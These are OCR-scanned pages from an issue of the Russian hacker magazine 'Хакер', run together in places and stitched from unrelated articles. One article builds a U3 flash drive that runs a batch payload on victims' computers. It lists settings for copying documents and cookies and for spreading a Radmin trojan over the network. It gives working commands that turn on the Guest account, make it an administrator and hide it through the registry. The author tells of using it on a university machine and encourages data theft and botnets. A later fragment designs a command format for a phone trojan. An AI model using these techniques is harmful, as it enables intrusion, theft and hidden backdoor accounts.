книги хакеры / журнал хакер / 126_Optimized

info

•Оптическоераспознаваниесимволов

— этооднаизсамых острыхпроблем примененияcaptchaфильтров.

•Сиспользованием OCR можнолегко обходитьтекущиереализацииCAPTCHA натакихресурсах, как

Yandex, Google идр.

•«Методлеммингов» ставитподсомнение эффективностьсамогоиспользования captcha-фильтров.

HTTP://WWW

links

•caca.zoy.org/wiki/ PWNtcha

•captchakiller.com

•securitylab.ru/ contest/239642.php

057

058

XÀÊÅÐ 06 /126/ 09

>>

Однаждывечеромясиделдома, почитывая за кружкой кофе очередной номер журнала «zакер», и вдруг наткнулся на статью про попытки взлома U3-флешки и софта под нее. Статья меня сильно заинтересовала тем, что флешка была не простая, а буквально золотая. И простор для хакерской деятельности на ней просто безграничен. Уже через день я приступил к опытам и изучению этого интереснейшего оборудования. Как оказалось, в самой системе таких флешек существовала уязвимость, которая потенциально позволяла взломщику сделать инъект в содержимое защищенного раздела флешки и заставить это содержимое исполняться на компьютере жертвы. К слову сказать, Большой Брат тоже не спит, поэтому все флешки такого типа перестали попадать к нам на прилавки уже через 2 недели. Сейчас их нет ни в одном магазине города. Но заказать такой U3-шный флеш-диск на 4 гига в инете нет никаких

проблем!

Порывшись в Сети, я не нашел никаких постов по этой теме и начал сам ковырять флешку, а именно — пробовал ее скопировать, разбить, переформатировать, изменить загрузочную область... В итоге, все мои попытки были обречены на провал, пока мне в руки не попал замечательный патч от

Kingston, в задачи которого входила пере-

прошивка моей флешки для совместимости

с Vista. И именно с его изучения началось

самое интересное.

ПОДАРОКХАКЕРУ— ПАТЧОТРАЗРАБОТЧИКА

Итак, у нас есть неизвестное приложение. При запуске оно опрашивает носитель, копирует данные с него к нам в комп, а после перепрошивки возвращает все по местам. Сопровождается этот праздник жизни всевозможными глюками и красивыми окошками, которые просто и незатейливо информируют юзера, что ему следует делать дальше. Пристальное внимание я обратил на сам исполняемый файл. Он заставил меня улыбнуться. Это незащищенное Winrar-приложение, имеющее тип самораспаковывающегося архива, в котором было необычное содержимое. Весь взлом состоял в распаковке и правке нужных ini-файлов блокнотом. Чем дальше я изучал их систему обновлений, тем больше мне это напоминало приколы из серии «почувствуй себя кул-хакером». В архиве лежали интерфейс обновлялки, функционал, который получал доступ к защищенному диску и iso-обра- зы — соответственно, для защищенного

диска, пустой перегородки между дисками и пустой рабочей части. Как принято в компании Kingston, все должно быть доступно для взлома, а это значило, что уже через 10 минут ковыряния в блокноте я создал

корректный файл автозапуска для защищенного диска. Он направлял выполнение кода сначала на мой обработчик, а затем уже на файлы LaunchU3-обработчика и так далее. Теперь пора поговорить об обработчике и исполняемом коде, определить концепции развития и общую структуру построения. В качестве языка для написания системы я выбрал командную строку Win32. Сделал я это по целому ряду причин, в числе которых — простота изучения этого языка и легковесность готовых исполняемых bat-файлов.

НЕПРИСТОЙНЫЕЗАПРОСЫ КОМАНДНОЙСТРОКИ

Преждечеммыполеземвдебри,давайрассмотрим основныеприколыкомандногоязыкаиметодыобходатехилииныхограничений.Перваяпроблема, котораядолгосотрясаламоймозг—этообращение крусскоязычнымпутямвпроводникеизпакетного файла.Если,допустим,сконсоливвести:

md c:\администратор\

@if «%pr%»==»disconected» @start calc&&pause @goto m1

В этом коде используются поисковые запросы, выполненные в кириллических символах. Они всенепременно исказятся в какую-то внутреннюю кодировку командной строки. Чтобы это обойти, выдели нужное тебе слово для поиска в окне командной строки исполняющегося пакетного файла правой кнопкой мыши и вставь в блокнот. Это может быть буква, строка и прочие символы, за исключением управляющих символов командной строки вроде скобок. Но даже в этом случае ты можешь

использовать синтаксис циклов FOR, которым наплевать на содержимое их переменных, или просто скопировать заранее заготовленные спецсимволы из другого файла. Как пример, ищи на DVD мою систему пересоздания плейлистов, для построения которых мне необходимо пользоваться тем, что командная строка не переносит в принципе!

Также, из-за чрезмерной обширности вопроса, могу лишь упомянуть о возможности запуска скриптов как в режиме ожидания окончания предыдущего, так и в многопоточном режиме. Нет никаких проблем написания таких программ, которые при выполнении программировали бы свое потомство, притом, далеко не по линейным

алгоритмам. Нет проблем и с математикой, матрицами и прочими полезными вкусностями. Даже базу данных состряпать в ней можно без труда, хотя не без геморроя. Всегда к твоим услугам справка Windows по командной строке и моя почта. Я буду только рад вопросам, потому что хочу расширить доступный мне функционал командной строки ее же средствами. Считаю использование этого языка хорошим подспорьем для затруднения отладки как отдельных программ, так и всей системы в целом. В свое время я писал большой проект, на который неоднократно покушались другие программисты, но все они, в итоге, нервно курили в сторонке, так и не поняв сути моих скриптов.

СОЗДАЕМСВОЙ ИСКУССТВЕННЫЙ ФЛЕШ-ИНТЕЛЛЕКТ

Нарукахунас— вызовнаисполнениезащищенного файла, которыйпоступилотприложениясзащищенного раздела. Сначаламыопределимбуквудиска, накоторый подключиласьнашафлешка, иоткудаейсужденоработать. Ясделалэто, используяобычныеIF’ыипередалих параметромвпакетныйфайл, находящийсянаосновном

>>

Глюки, выявленные тестированием

ИзначальносистемаписаласьподWindowsXP Home, нопослееетестированиянаWindowsXP Pro выявились некоторыеглюки. Например, системадолгоиисправно работаланавсехкомпах, покасомнойимоимтоварищем неслучиласьследующаяистория. Однаждымайским днемнамвыпалавозможностьпопастьвдругойкорпус родногоуниверситетаиполучитьдоступккомпьютеру, черезкоторыйтакилииначепроходятвсеметодички, дипломныеработыивкусности, накоторыхможнобыло бынеплохонавариться. Придявкорпус, япередалприятелюфлешку, послечегомыпошли«надело». Сначала меня, каксейчаспомню, немногоозадачиланадпись Windows2000 наэкранемонитора, ноужечерезмгновениефлешкавеселоибодромигаласвоейлампочкойв гнездеUSB. Флешканезахотелаатаковатькомпьютер, ия, недолгодумая, врубилпринудительнуюатаку. Время шло, флешкаработала, амывыполнялисобственното, зачемнаснаправиливэтототдел. Послеокончания работымыснетерпениемвернулисьвродныекорпуса. Ода! Флешкасработалачудесно! Посетимыпрониклив однуизсамыхзащищенныхмашинискайфомвглядывалисьвдействительноинтересныефотографиисотрудниц отдела. Итакпродолжалосьдосамогообрывасвязи. «Ну, ничего— завтравсескопируем», — сказалятоварищу, и

мыпошлиподомам. Наследующееутромоегодругаподнялипотревоге– надобылосрочноявитьсявтототдел, чтобыподправитькакие-тополя. Почуявнеладное, мы подключилиськвузовскойсетиисталипытатьсязайтина тоткомпьютер. Насждалоблом– компьютерпинговался, нонеотвечал. Сильноозадаченныемыпошливдругой корпус.

Придя, мынаблюдалиследующуюкартину: компьютер,

возленегонесколькочеловек. Онисмотрелинанас глазамиманьяков, которыедавноникогонеубивали. На всепоследующиевопросымысделалилицакирпичоми сталинестинупростополнуюахинеюпроинтернет, его развитиеивирусы. Насвыслушалииповерили. Когда мыспросили, ачтожеслучилось, намрассказали, что умашинывнезапнослетеливсепароли. Онивызвали местногосисадмина, которыйдобрыхтричасавозилсяс табличкойвводапароля, и, видимо, совсемотчаявшись, наугадввелимяпользователя«Гость» инажал«Enter». Системанеожиданнопорадовалаегонетолькоуспешнымвходом, ноиадминскимиполномочиямивпридачу. Воттакиепироги.

U3-ШНОЕМЕНЮМОЕГОДЕВАЙСА

СОЗДАЕМГЛОБАЛЬНЫЕПЕРЕМЕННЫЕДЛЯРАБОТЫ НАШЕЙФЛЕШКИ

Cookies cookies .jpeg .jpg .bmp .gif .pic .pict .ico —

фильтры, чтобы не перегрузить флешку всяким хламом rem #.jpeg .jpg .bmp .gif .pic .pict .ico .gif .html

.htm — другой набор фильтров под другие задачи

set find_evristic_analyze_in_file_types=1 — включить ли искусственный интеллект для типов фаилов? (0\1) set find_evristic_analyze_in_file_folders=1 — дать ли искусственному интеллекту доступ к структуре папок? (0\1)

set recent_folder_for_analyze=%homedrive%%homepath%\ Recent\

set no_find_documents=0 — мне не искать текстовые документы вообще?

set no_copy_all_documents=0 — вообще пропускать копирование каких-либо документов?

set not_attacking=0 — не атаковать?

set no_use_radmin=0 — мне нельзя устанавливать радмин трояна в целевую систему?

set no_use_LanMod_for_Radmin=0 — мне не пытаться устанавливать радмин по сети на соседние машины?

set use_only_radmin=0 — вся атака должна состоять только из установки радмина?

set no_create_message=0 — в процессе работы не использовать место на диске для создания сообщений

set no_display_message=0 — про пользователя совсем забудем? Ну и правильно — ему нечего знать не надо

Отдельнохотелосьбырассказатьобатакенагостя, котораяявляется гвоздемнашейпрограммы:

if %attack_for_guest%==0 goto m3 — исключающее или chcp 1251 — подключим кодировку для кириллицы

net user гость /active:yes — активируем учетную запись гостя

net localgroup администраторы гость /add — сделаем гостя равным администратору по правам

@reg add «HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\Winlogon\SpecialAccounts\ UserList» /v гость /t reg_dword /d 0 /f — скроем появившуюся учетку с глаз долой от юзера

net user гость 1234 — приправим паролем по вкусу

ОБУДОБСТВАХНЕЗАБЫВАЕМ

Ну, хорошо, мывкакой-тостепениудовлетворилинашизапросыпо взлому, нопомимовсегопрочего, моясистемаобладаетмассойприятныхфенечекифишек, таких, какавтоматизированныйвходваську. На дискетыслегкостьюдолженнайтифайл«pqp.bat».

Именноонуправляетвводомпароля. Этотскриптпросматриваетсвое

>>

телоипоследовательноосуществляетклавиатурныйввододносимвольныхкомментариеввтекстепрограммы. Еслираскидатьпоэтомуфайлу комментариитакимобразом:

rem V rem 1 rem 3 rem 3 rem k rem g rem r rem s

— тонавыходемыполучимпароль«V133kgrs». Витоге, пассхранится внестандартномвидеинетребуетпривводенашегоучастия. Следующая приятная фишка: если на флешке окажется места меньше заранее определенного объема, то автоматически откроется утилита для удобного рассмотрения содержимого диска «scanner.exe». Ты меломан, как и я? Тогда тебя порадует встроенная поддержка плейлистов от Windows Media Player и возможность их пересоздания специальным скриптом или вовсе автоматически. Вся музыка для этого заботливо укладывается в папочку MUZON. Если у тебя включен идентификатор типа «% BASE%==BASE» , то система автоматически скопирует тебе на рабочий стол в отдельную папочку все награбленное добро с флешки. Я в свое время успешно ее использовал для решения повседневных задач системного администратора, вроде полностью автоматизированной установки и настойки, например, антивирусов на компьютерах юзеров.

Чуть не забыл! Чтобы собственная флешка не ополчилась на тебя, необходимо залезть по адресу «Пуск Æ Настройка Æ Панель управления Æ Система Æ Дополнительно Æ Переменные среды» и

прописать там нужные идентификаторы. Вот список уже поддерживаемых:

BASE

DRUG

GUARD

SPY

Посути, этоглобальныепеременныетвоейоперационнойсистемы, которыевосстанавливаютсяприкаждомвходевнее. Пользуйсяна здоровье.

ОБСУДИМИТОГИ

Мыполучили, своегородаплатформу, котораябудетотличноработать нетольконатвоеймашине, ноигде-тотам, вчужойквартире, похищая нужныетебеданные. Иневажно, ктоты, мойчитатель, утебявсегда

найдутсявопросыизадачи, скоторымимоглабысправитьсямоясистема. Допустим, тыстудент-раздолбай; тогдафлешкапоможеттебедостатьне толькокурсовыеутвоегопрепода, ноичертежиипрочуюхрень, которая поставляетсявкомплектескурсачом. Еслитыужепоимелвсюсетьвуза ипомогаешьсотрудникамчерезRadmin раскладыватьпасьянс, то можешьпойтипрогулятьсядоближайшегосалонасотовойсвязи. Есть шансзаполучитьвсвоимохнатыерукиихплатежныхклиентов— выгодуоценивайсам. Еслитебеиэтогомало, тохочуотметитьцелыйряд ситуаций, когда, недайБог, сотрудникСбербанкасогласитсяпринять ствоейфлешкиотсканированныйтобойчек.

Болеетого,сейчасвсенакаждомуглувужасекричатотэпидемиивируса Conficker,ачемтыхуже?Неужели,имеявсвоемраспоряжениитакоймощныйинструмент,тыневсостояниинаписатьсвойтренировочныйботнет? Однимсловом—срочнобегиискатьфлеш-дискU3шноготипа.Впрочем, еслинемногопозаниматьсямазохизмом,сойдетлюбаяфлешка.z

>> взлом

ФОРМАТ УПРАВЛЯЮЩЕЙКОМАНДЫ

Первое, счегонадоначатьнаписаниетрояна— разработкаформатакоманды, которуюсервер будетпередаватьклиентам(зараженнымтелефонам). Япредлагаювоттакойвид:

1.Команда состоит из шести частей, разделенных символом "%"

2.Первая часть:

•at% AT-команда для модема

•sm% команда отправки СМС

•sh% команда шелла (например, ls, whoami, ping www.ru)

•tg% команда настройки работы самого трояна 3. Третьи и вторая части — аргументы

команды из первой части. Например:

•sm%79101010101%TEST is OK%<хвост команды> 4. Четвертая часть — тип отправки

результата команды, может принимать значения:

•%ws% отправка http-запросом параметра GET

•%sm% отправка «внутри» SMS-сообще- ния

5. Пятая и шестая части - аргументы для отправки команды, например:

•%79102020202% номер телефона в международном формате

•%192.168.1.100%/master-server/res. php?res=%

Примеры команд:

•sm%79101010101%test is OK%0%0%0% — отправить СМС с текстом: "test is OK" на номер +79101010101

•sh%ping –c10 www.ru%0%ws%192. 168.1.100%/master-server/res. php?res=% — выполнить команду шелла «ping www.ru» и выслать результат выполнения на 192.168.1.100

•tg%3600%0%0%0%0% — установить интервал получения команды с сервера равным 3600 секунд

Парусловоразделителе: ямаксимальнохотел использоватькомандышелла, поэтомуоставил всеспецсимволынаиспользованиевскриптах (чтобыможнобыловыполнятьразныетамcat / dev/random > /tmp/fuck-memory-economy или ls / | grep txt ипр.). Такимобразом, разделителемсталпроцент— %. Чтокасаетсяобщейконцепциикоманды, тоздесьвсетожеочевидно.

Первыетрипараметра— управляющаячасть, инструкциятипа«чтосделать». Вторыетри параметра— ответнаячасть, инструкциятипа «кудаскинутьрезультатвыполнения». Если сэтимвсепонятно, тонечеготянутьрезину, переходимккодингу.

АРХИТЕКТУРАПРОГРАММЫ

Всефункциияразнеспоотдельнымфайламв зависимостиотсмысловойнагрузки. Основной файлtrojan.c максимальнооблегченотненужногокода. Вотсписокфайловиихназначений:

trojan.c Основной файл с main() функцией программы

Makefile Инструкции утилите make для сборки трояна

./cmd: Разбор строки с командой и заполнение структуры

cmd-parser.c cmd-parser.h

./http: HTTP-клиент. Отправка запросов, возвращение результата http-client.c

http-client.h